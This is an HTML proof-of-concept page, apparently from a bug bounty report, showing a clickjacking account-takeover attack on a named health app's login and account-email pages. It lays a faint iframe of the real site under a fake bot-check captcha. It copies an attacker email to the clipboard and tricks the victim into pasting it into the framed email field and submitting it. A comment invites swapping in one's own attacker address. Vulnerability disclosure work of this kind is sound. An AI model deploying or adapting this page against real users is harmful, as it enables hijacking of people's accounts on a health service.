<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
        <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body,
        html,
        iframe {
            width: 100%;
            height: 100%;
        }

        #oliviaIframe {
            width: 100%;
            position: absolute;
            z-index: 2;
            opacity: 0.3;
            pointer-events: auto;
        }

        #startButton {
            z-index: 2;
            position: absolute;
            top: 40px;
            bottom: 0;
            left: 0;
            right: 0;
            margin: auto;
            height: 70px;
            width: 270px;
        }

        h1, p {
            text-align: center;
            font-size: 3rem;
            padding-top: 3rem;
        }
        
        button {
            z-index: 3;
        }

        li {
            margin-left: 1rem;
        }

        .payload {
            width: 100%;
            height: 100%;
            border: 1px solid green;
            display: flex;
            flex-direction: column;
            justify-content: flex-start;
            align-items: center;
            padding-top: 1.2rem;
            display: none;
        }

        #copyButton, #verifyButton {
            margin-top: .75rem;
            padding: .25rem;
        }

        #verifyButton {
            margin-top: 6.5rem;
        }

        .button-group {
            display: flex;
            flex-direction: column;
            justify-content: center;
        }

        .fake-input-box-group {
            display: flex;
            flex-direction: row;
            justify-content: center;
            gap: 1rem;
        }

        .fake-input-box {
            width: 500px;
            height: 30px;
            border: 1px solid grey;
            margin: 1.5rem auto;
            text-align: center;
            padding-top: .3rem;
        }

        #verifyButton {
            z-index: -1;
        }

        #startPayload {
            position: fixed;
            left: 0;
            top: 70px;
            bottom: 0;
            right: 0;
            margin: auto;
            width: 300px;
            height: 30px;
        }
        </style>
    </head>
    <body>
        <button onclick="startPayload()" id="startPayload">DOUBLE CLICK TO BEGIN</button>
        <iframe id="oliviaIframe" src="https://app.oliviahealth.ai/login"></iframe>
        <h1>PoC Created By: n30@bugcrowdninja.com</h1>
        <p id="verificationText">In order to access this site, verify you're not a bot:</p>
        <div class="payload" id="payload">
            <ol>
                <li>Click the "COPY CAPTCHA CODE" below</li>
                <li>Click 3 times on the box then paste with CTRL+V or Mouse</li>
                <li>Click the VERIFY button</li>
                <div class="button-group">
                    <button onclick="copyCaptcha()" id="copyButton">COPY CAPTCHA CODE</button>
                    <div class="fake-input-box">CLICK 3 TIMES HERE THEN PASTE YOUR CAPTCHA CODE</div>
                    <button onmouseover="hideVerifyButton()" id="verifyButton">VERIFY</button>
                </div>
            </ol>
        </div>
    </body>
    <script>

        function startPayload() {
            document.getElementById("startPayload").style = "display: none";
            document.getElementById("payload").style = "display: flex";

            // Show the payload <div>
            setTimeout(() => {
                document.getElementById("oliviaIframe").src = "https://app.oliviahealth.ai/account/email";
            }, 3000);
        }

        function copyCaptcha() {
            const textToCopy = "attacker@attacker.com"; // CHANGE THIS TO YOUR ATTACKER EMAIL
            
            navigator.clipboard.writeText(textToCopy)
                .then(() => alert("CAPTCHA code copied to clipboard!"))
                .catch(err => console.error("Failed to copy: ", err));
        }
    </script>
</html>
